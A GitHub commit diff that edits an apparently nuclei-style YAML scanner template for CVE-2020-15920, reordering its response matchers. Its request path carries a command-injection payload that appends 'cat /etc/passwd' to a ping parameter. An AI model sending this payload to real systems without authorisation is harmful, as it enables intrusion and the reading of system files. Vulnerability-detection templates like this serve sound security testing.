Update CVE-2020-15920.yaml

patch-1
Prince Chaddha 2022-05-17 12:12:00 +05:30 committed by GitHub
parent 9ce21ef818
commit 0697346ae6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 5 deletions

View File

@ -19,14 +19,15 @@ requests:
- method: POST
path:
- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/05/16